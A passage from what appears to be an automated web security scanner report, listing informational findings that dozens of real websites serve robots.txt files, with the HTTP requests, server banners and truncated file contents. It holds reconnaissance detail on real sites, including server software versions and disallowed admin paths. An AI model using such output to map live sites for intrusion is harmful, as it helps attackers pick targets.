Accept-Ranges: bytes
Content-Length: 206
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /apac/2007/
Disallow: /events/apac/2009/
Disallow: /events/apac/2008/
Disallow: /email/
Disallow: /events/apac/2010/
Disallow: /events/apac/2010/homepage/index.
...[SNIP]...
24.192. http://www.collegeconfidential.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegeconfidential.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegeconfidential.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 15 Feb 2011 21:48:41 GMT
Accept-Ranges: bytes
Content-Length: 387
Vary: Accept-Encoding
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerims_ccinfo_pool=3298375690.20480.0000; path=/

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
24.193. http://www.collegehumor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegehumor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:39 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 21:10:15 GMT
ETag: "9c078-2c5-49ec8344dbbc0"
Accept-Ranges: bytes
Content-Length: 709
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /etc
Disallow: /_jument/ads
Allow: /
Sitemap: http://www.collegehumor.com/static_sitemap.xml
Sitemap: http://www.collegehumor.com/xml_sitemap/videos.xml
Sitemap: http://www.col
...[SNIP]...
24.194. http://www.columbia.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.columbia.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.columbia.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:15 GMT
Server: Apache/2.2.17
Last-Modified: Thu, 02 Jul 2009 16:02:03 GMT
Accept-Ranges: bytes
Content-Length: 1959
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# for info on robots.txt syntax see
# http://www.searchtools.com/robots/robots-txt.html

User-agent: Ultraseek
Disallow: /~nsn1/
Disallow: /acis/cria/rosenberg/
Disallow: /acis/draft/
Disallow: /acis/
...[SNIP]...
24.195. http://www.comcast.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comcast.com

Response

HTTP/1.1 200 OK
Content-Length: 943
Content-Type: text/plain
Last-Modified: Wed, 30 Mar 2011 14:42:26 GMT
Accept-Ranges: bytes
ETag: "cf2211b0e8eecb1:149e"
Server: Microsoft-IIS/6.0
Date: Sat, 02 Apr 2011 12:43:30 GMT
Connection: close
Set-Cookie: BIGipServerpool_comcastcom_VIP1=86896965.20480.0000; path=/


# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /connectyourfreewii
Disallow: /About/PressRelease/PressReleaseDetail.ashx?PRID=305
Disallow: /About/PressRelease/PressR
...[SNIP]...
24.196. http://www.comcast.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comcast.net

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 02 Apr 2011 12:37:55 GMT
Cache-Control: max-age=300
Content-Type: text/plain
Content-Length: 394
X-Pad: avoid browser bug
Date: Sat, 02 Apr 2011 12:37:55 GMT
Connection: close

# robots.txt for comcast.net :: akamai version

User-agent: *
Disallow: /user/authkey/
Disallow: */data/*
Disallow: /beta/
Disallow: /mycomcast/
Disallow: /b/
Disallow: /c/
Disallow: /d/
Disallow: /e/
...[SNIP]...
24.197. http://www.comedycentral.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comedycentral.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comedycentral.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 490
Content-Type: text/plain
Last-Modified: Tue, 24 Aug 2010 22:02:19 GMT
ETag: "1ea-4c74416b"
Accept-Ranges: bytes
Cache-Control: max-age=1026
Expires: Sat, 02 Apr 2011 13:54:09 GMT
Date: Sat, 02 Apr 2011 13:37:03 GMT
Connection: close

# robots.txt for Disallow: /

Sitemap: http://www.comedycentral.com/sitemap_robots.jhtml

User-agent: *
Disallow: /global
Disallow: /sitewide
Disallow: /search
Disallow: /inhouse
Disallow: /m
...[SNIP]...
24.198. http://www.comfortinn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comfortinn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.comfortinn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 11 Feb 2011 17:10:14 GMT
ETag: "102-49c04c57dc980"
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 258
Date: Sat, 02 Apr 2011 14:03:44 GMT
Connection: close

User-agent: AdsBot-Google
Disallow: /download/survey/*

User-agent: *
Crawl-delay: 1
Disallow: /ires/
Disallow: /bestrate/
Disallow: /de/*
Disallow: /ja/
Disallow: /cities/*
Disallow: /hotel
...[SNIP]...
24.199. http://www.complaintsboard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.complaintsboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.complaintsboard.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 21:28:41 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 22 Oct 2010 03:11:34 GMT
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
24.200. http://www.computing.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computing.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.computing.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:43:13 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Wed, 19 May 2010 13:21:14 GMT
ETag: "6d84a69-83-486f2550d8680"
Accept-Ranges: bytes
Content-Length: 131
Vary: Accept-Encoding,User-Agent

User-agent: *
Disallow: /cgi-bin/*
Disallow: /model/
Disallow: /manufacturer/
Sitemap: http://www.computing.net/pushad/sitemap.xml
24.201. http://www.confirmit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.confirmit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.confirmit.com

Response

HTTP/1.1 200 OK
Content-Length: 374
Content-Type: text/plain
Last-Modified: Wed, 01 Sep 2010 19:59:08 GMT
Accept-Ranges: bytes
ETag: "dcbd7f23104acb1:2f65"
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:06:52 GMT
Connection: close

# robots.txt for http://www.confirmit.com/
User-agent: *
Sitemap: http://www.confirmit.com/sitemap.xml
Sitemap: http://www.confirmit-horizons.com/sitemap_ch.xml
Disallow:/12/
Disallow:/11/
Disal
...[SNIP]...
24.202. http://www.consumeraffairs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumeraffairs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consumeraffairs.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:08 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 14:00:36 GMT
ETag: "5cc0ac-a5-49fb399d9e900"
Accept-Ranges: bytes
Content-Length: 165
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /admin/
Disallow: /beta/
Disallow: /cms/
Disallow: /reputation-management/users/
Disallow: /reputation-management/admin/
Disallow: /scripts/
24.203. http://www.consumerreports.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumerreports.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consumerreports.org

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise
Date: Sat, 02 Apr 2011 13:38:39 GMT
Content-type: text/plain
Last-modified: Fri, 11 Mar 2011 19:09:10 GMT
Content-length: 11143
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /access/
Disallow: /Avantgo/
Disallow: /ProdSelect/
Disallow: /Special/Avantgo/
Disallow: /cro/home-garden/sports-exercise-equipment/infomercial-exercise-2-08/
Disallow: /cro/h
...[SNIP]...
24.204. http://www.consumersearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consumersearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consumersearch.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.8 (Unix) PHP/5.2.6 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 19 Jan 2011 17:52:28 GMT
Content-Type: text/plain
Cache-Control: max-age=1150853
Expires: Fri, 15 Apr 2011 21:14:47 GMT
Date: Sat, 02 Apr 2011 13:33:54 GMT
Content-Length: 2063
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
24.205. http://www.contactatonce.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contactatonce.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contactatonce.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:57 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 05 Aug 2009 16:00:08 GMT
ETag: "e0-4706718de3200"
Accept-Ranges: bytes
Content-Length: 224
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sat, 09 Apr 2011 13:45:57 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /carsoup/
Disallow: /icon/
Disallow: /help/
Disallow: /install/
Disallow: /lexus/
Disallow: /onecommand/
Disallow: /order/
Disallow: /setup/
Disallow: /ukorder/
Disallow: /imag
...[SNIP]...
24.206. http://www.contactmusic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contactmusic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contactmusic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 22 Feb 2011 12:26:06 GMT
ETag: "1401eeb-359b6-49cde159b1380"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Cache-Control: no-store
Pragma: no-cache
Expires: Tue, 31 Dec 2019 12:34:56 GMT
x-cdn: CMcdn
Connection: close

User-agent: *
Disallow: /0/
Disallow: /index.nsf/singleindexc_new/
Disallow: /new/home.nsf/webpagestmp/
Disallow: /index.nsf/event-gallery-index_new/
Disallow: /index.nsf/gallery-index_new/
Disallow:
...[SNIP]...
24.207. http://www.contextoptional.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contextoptional.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contextoptional.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:14:29 GMT
Server: Apache
Last-Modified: Sun, 18 Jul 2010 03:02:18 GMT
ETag: "c41c23f-130-48ba0ae0da280"
Accept-Ranges: bytes
Content-Length: 304
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
24.208. http://www.continental.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.continental.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.continental.com

Response

HTTP/1.0 200 OK
Content-Length: 1517
Content-Type: text/plain
Last-Modified: Fri, 29 Oct 2010 18:49:47 GMT
Accept-Ranges: bytes
ETag: "a5579f9a77cb1:32ae"
X-Powered-By: ASP.NET
Server: Continental Airlines, Inc.
Cache-Control: max-age=1800
Date: Sat, 02 Apr 2011 14:15:45 GMT
Connection: close

User-agent: *
Disallow: /web/en-US/apps/booking/flight/fareCalendar.aspx
Disallow: /web/en-us/apps/booking/flight/farecalendar.aspx
Disallow: /web/en-US/apps/vendors/emailForm.aspx
Disallow: /web/
...[SNIP]...
24.209. http://www.coolmath-games.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath-games.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolmath-games.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Sat, 02 Apr 2011 13:24:57 GMT
Content-Type: text/plain
Content-Length: 330
Last-Modified: Tue, 09 Feb 2010 21:35:28 GMT
Connection: close
Accept-Ranges: bytes

User-agent: TurnitinBot
User-agent: sitecheck.internetseer.com
User-agent: RB2B-bot
User-agent: SBIder
User-agent: OmniExplorer_Bot
User-agent: Baiduspider+
User-agent: Becomebot
Disallow: /

User-age
...[SNIP]...
24.210. http://www.coolmath.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolmath.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:16 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 06 Feb 2010 23:13:26 GMT
ETag: "366bdcf-14a-b71c9180"
Accept-Ranges: bytes
Content-Length: 330
Connection: close
Content-Type: text/plain

User-agent: TurnitinBot
User-agent: sitecheck.internetseer.com
User-agent: RB2B-bot
User-agent: SBIder
User-agent: OmniExplorer_Bot
User-agent: Baiduspider+
User-agent: Becomebot
Disallow: /

User-age
...[SNIP]...
24.211. http://www.coolmath4kids.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolmath4kids.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolmath4kids.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:49 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 09 Feb 2010 05:35:07 GMT
ETag: "2c3f09d-14a-47ccd8c0"
Accept-Ranges: bytes
Content-Length: 330
Connection: close
Content-Type: text/plain

User-agent: TurnitinBot
User-agent: sitecheck.internetseer.com
User-agent: RB2B-bot
User-agent: SBIder
User-agent: OmniExplorer_Bot
User-agent: Baiduspider+
User-agent: Becomebot
Disallow: /

User-age
...[SNIP]...
24.212. http://www.coolsavings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolsavings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coolsavings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:03:28 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Connection: close
Content-Type: text/html

User-agent: *
Disallow:
Sitemap: sitemap.php
24.213. http://www.cornell.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cornell.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cornell.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:20 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l JRun/4.0
Last-Modified: Thu, 10 Feb 2011 19:56:22 GMT
ETag: "2d9774-7a-49bf2f9cf91dd"
Accept-Ranges: bytes
Content-Length: 122
Content-Type: text/plain
Set-Cookie: BALANCEID=balancer.cf068; path=/; domain=.cornell.edu
Connection: close

User-agent: *
Crawl-Delay: 6
Disallow: /trustees/eupdate/
Disallow: /print.cfm
Disallow: /events/
Disallow: /presentation/
24.214. http://www.costco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.costco.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.costco.com

Response

HTTP/1.1 200 OK
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:31 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Mon, 28 Mar 2011 22:23:08 GMT
ETag: "02eecb696edcb1:18d3"
Content-Length: 1269
Vary: Accept-Encoding, User-Agent

User-Agent: *
Disallow: /bin/
Disallow: /images/
Disallow: /Checkout/
Disallow: /Coremetrics/
Disallow: /OrderStatus/
Disallow: /Pharmacy/Banner.asp
Disallow: /Pharmacy/FrameMaster.asp
Disallo
...[SNIP]...
24.215. http://www.couponcabin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponcabin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.couponcabin.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:28 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 06:21:56 GMT
ETag: "403ab26-22a-49fe98b0e2900"
Accept-Ranges: bytes
Content-Length: 554
Vary: Accept-Encoding
X-backend: nyapp02
Connection: close
Content-Type: text/plain; charset=UTF-8

SITEMAP: http://www.couponcabin.com/sitemap_index.xml.gz

User-agent: *
Disallow: /r/
Disallow: /s/
Disallow: /cc-rc/
Disallow: /cc-rd/
Disallow: /cc-rs/
Disallow: /cc-sd/
Disallow: /cc-gh/
Disallow:
...[SNIP]...
24.216. http://www.couponmountain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.couponmountain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.couponmountain.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:49 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 01:12:12 GMT
ETag: "ec71f-42c-49f80a227f300"
Accept-Ranges: bytes
Content-Length: 1068
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow:/merchant.php
Disallow:/category.php
Disallow:/tag.php
Disallow:/frame.php
Disallow:/popup.php
Disallow:/account.php
Disallow:/redir.php
Disallow:/click_coupon.php
Disallow:/for
...[SNIP]...
24.217. http://www.coupons.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coupons.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coupons.com

Response

HTTP/1.1 200 OK
Content-Length: 91
Content-Type: text/plain
Last-Modified: Mon, 29 Nov 2010 06:32:19 GMT
Accept-Ranges: bytes
ETag: "b147562c8f8fcb1:3f3e"
Server: Microsoft-IIS/6.0
p3p: CP="ALL DSP COR LAW CURa ADMa DEVa TAIa IVAi CONi OUR BUS IND PHY ONL COM NAV DEM OTC"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:26 GMT
Connection: keep-alive
CI_SVR_ID: 10/11
Set-Cookie: NSC_Njdsptjuft-IUUQ=ffffffffc3a0141a45525d5f4f58455e445a4a423660;Version=1;Max-Age=600;path=/

User-agent: *
Disallow: /RSSlink.asp
Disallow: /terms/
Disallow: /privacy/
Allow: /

24.218. http://www.coveritlive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coveritlive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.coveritlive.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Debian) PHP/5.2.6-2+b1 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Sat, 27 Nov 2010 22:11:20 GMT
ETag: "7a0009-16f-496101e5e9200"-gzip
Content-Type: text/plain
X-Cache-Lookup: MISS from localhost.localdomain:80
Date: Sat, 02 Apr 2011 13:56:28 GMT
Content-Length: 367
Connection: close

User-agent: *
Disallow: /index2.php
Disallow: /index2.php/
Disallow: /mobile.php
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallo
...[SNIP]...
24.219. http://www.cowboylyrics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cowboylyrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cowboylyrics.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:07:59 GMT
Server: Apache/2.2.4
Last-Modified: Fri, 16 Feb 2007 06:00:00 GMT
ETag: "a220a-21-af9ad800"
Accept-Ranges: bytes
Content-Length: 33
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /guest
24.220. http://www.cox.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cox.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cox.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:54 GMT
Server: Apache
Last-Modified: Thu, 16 Mar 2006 18:22:50 GMT
ETag: "1a373-158c-c7a9b280"
Accept-Ranges: bytes
Content-Length: 5516
Keep-Alive: timeout=30, max=28800
Connection: Keep-Alive
Content-Type: text/plain

###
#Unsafe robots to keep away
###
User-agent: Aqua_Products
Disallow: /

User-agent: asterias
Disallow: /

User-agent: b2w/0.1
Disallow: /

User-agent: BackDoorBot/1.0
Disallow: /

User-agent: Black
...[SNIP]...
24.221. http://www.cracked.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cracked.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cracked.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
Last-Modified: Tue, 28 Dec 2010 16:53:45 GMT
ETag: "b9007-72-4987b4baef840"-gzip
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:33:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:15 GMT
Content-Length: 114
Connection: close
Set-Cookie: BIGipServerorigin.cracked.com=1066797322.20480.0000; path=/

User-agent: *
Disallow:/craptions/archive/
Disallow:/craptions/category/
Disallow: /search/
Disallow: /forums/
24.222. http://www.crackle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crackle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crackle.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 25 Feb 2011 01:20:08 GMT
Accept-Ranges: bytes
ETag: "2ccc11248ad4cb1:bdd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Date: Sat, 02 Apr 2011 13:44:16 GMT
Age: 8643
Content-Length: 232

User-agent: *
Disallow: /rss/
Disallow: /App/
Disallow: /app/
Disallow: /Report/
Disallow: /ps3/
Disallow: /gtv/
Disallow: /chromewebapp/
Disallow: /members/
Sitemap: http://crackle.com/profi
...[SNIP]...
24.223. http://www.craigslist.ca/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.craigslist.ca
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.craigslist.ca

Response

HTTP/1.1 200 OK
Connection: close
Last-Modified: Fri, 18 Dec 2009 01:10:13 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:36:20 GMT
Vary: Accept-Encoding
Content-Length: 665
Content-Type: text/plain
Server: Apache
X-Pad: avoid browser bug

##############################
# Exclude robots from these

User-agent: YahooFeedSeeker
Disallow: /forums
Disallow: /res/
Disallow: /post
Disallow: /email.friend
Disallow: /reply
Disallow: /?flagCode

...[SNIP]...
24.224. http://www.crateandbarrel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.crateandbarrel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.crateandbarrel.com

Response

HTTP/1.0 200 OK
Content-Length: 197
Content-Type: text/plain
Last-Modified: Mon, 08 Nov 2010 21:22:02 GMT
Accept-Ranges: bytes
ETag: "57e225fc8a7fcb1:233b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:05:36 GMT
Connection: close

User-agent: *
Disallow: /account
Disallow: /bin
Disallow: /checkout
Disallow: /js
Disallow: /manager
Disallow: /gift-registry/guest/
Disallow: /Gift-Registry/Guest/
Disallow: /search.aspx?
24.225. http://www.creditreport.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditreport.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditreport.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 629
Content-Type: text/plain
Last-Modified: Thu, 03 Mar 2011 16:57:11 GMT
ETag: "80db79c4d9cb1:1510"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:31:39 GMT
Set-Cookie: BIGipServercreditreport-web-pool=170986250.39455.0000; path=/
X-PvInfo: [S10203.C6506.A6016.RA0.G0.UACBD09A4].[OT/plaintext.OG/documents]

User-agent: *
Disallow: /rt/
Disallow: /rt
Disallow: /rt?
Disallow: /dni/
Disallow: /DNI/
Disallow: /Dni/
Disallow: /Order1.aspx
Disallow: /Order2.aspx
Disallow: /images/
Disallow: /Images/
...[SNIP]...
24.226. http://www.csmonitor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csmonitor.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Fri, 19 Feb 2010 15:46:40 GMT
Served-By:
Content-Type: text/plain
Cache-Control: max-age=14012
Expires: Sat, 02 Apr 2011 17:20:45 GMT
Date: Sat, 02 Apr 2011 13:27:13 GMT
Content-Length: 2969
Connection: close

User-agent: Mediapartners-Google*
Disallow: /includes/
Disallow: /keepalive.html

User-agent: *
Disallow: /sudoku
Disallow: /404
Disallow: /Innovation/Horizons/2009/1123/which-best-buy-black-friday-sa
...[SNIP]...
24.227. http://www.curse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.curse.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1932476484.20480.0000; path=/
Content-Type: text/plain
Last-Modified: Mon, 21 Mar 2011 14:54:11 GMT
Accept-Ranges: bytes
ETag: "b62e64d6d7e7cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT
Xonnection: Xeep-alive
Content-Length: 160

...User-agent: *
Disallow: /ajax/

User-agent: *
Disallow: /api/

User-agent: *
Disallow: /ControlPanel/

User-agent: Mediapartners-Google*
Disallow:
24.228. http://www.cvs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cvs.com
Path:   /favicon.ico

Issue detail

